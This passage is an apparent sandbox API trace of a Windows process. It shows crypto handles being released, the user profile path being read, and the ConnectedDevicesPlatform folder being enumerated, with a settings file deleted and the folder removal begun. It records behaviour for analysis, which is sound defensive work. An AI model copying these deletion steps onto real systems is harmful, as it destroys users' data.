(in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0156.510] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0156.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa918, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0156.510] CryptDestroyKey (hKey=0x9e2178) returned 1 [0156.510] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.510] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.510] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0156.510] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.510] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0156.510] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.510] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.510] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0156.510] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0156.510] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0156.510] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0156.510] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0156.510] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0156.510] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.513] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.513] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0156.513] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.513] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.513] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0156.513] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.513] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0156.513] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.513] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.513] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0156.513] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.513] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0156.514] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.514] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0156.514] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.514] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0156.514] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.514] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.514] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0156.514] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0156.514] CryptReleaseContext (hProv=0x9bee68, dwFlags=0x0) returned 1 [0156.515] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.515] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0156.515] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.515] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0156.515] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.515] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0156.515] FreeLibrary (hLibModule=0x76390000) returned 1 [0156.515] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.515] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.515] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.515] CloseHandle (hObject=0x470) returned 1 [0156.516] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0156.516] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.516] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0156.516] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0156.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0156.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0156.516] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0156.516] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ConnectedDevicesPlatform", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpFilePart=0x8cedf4*="ConnectedDevicesPlatform") returned 0x36 [0156.516] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74010 | out: hHeap=0x2af0000) returned 1 [0156.516] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\connecteddevicesplatform")) returned 0x10 [0156.516] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform\\*.*", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName=".", cAlternateFileName="")) returned 0x9e20b8 [0156.516] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc58b9bba, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="..", cAlternateFileName="")) returned 1 [0156.516] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x435d76fd, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x5f7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CDPGlobalSettings.cdp", cAlternateFileName="CDPGLO~1.CDP")) returned 1 [0156.516] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform\\CDPGlobalSettings.cdp" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\connecteddevicesplatform\\cdpglobalsettings.cdp")) returned 1 [0156.517] FindNextFileW (in: hFindFile=0x9e20b8, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc58b9bba, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc58b9bba, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x435d76fd, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x5f7, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="CDPGlobalSettings.cdp", cAlternateFileName="CDPGLO~1.CDP")) returned 0 [0156.517] FindClose (in: hFindFile=0x9e20b8 | out: hFindFile=0x9e20b8) returned 1 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.517] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0156.517] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0156.517] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0156.517] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0156.518] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6c0 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0156.518] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0156.518] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0156.519] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x6e) returned 0x2a73d40 [0156.519] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/ConnectedDevicesPlatform", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", lpFilePart=0x8cf650*="ConnectedDevicesPlatform") returned 0x36 [0156.519] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73d40 | out: hHeap=0x2af0000) returned 1 [0156.519] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\connecteddevicesplatform")) returned 0x10 [0156.519] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\AppData\\Local\\ConnectedDevicesPlatform", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, 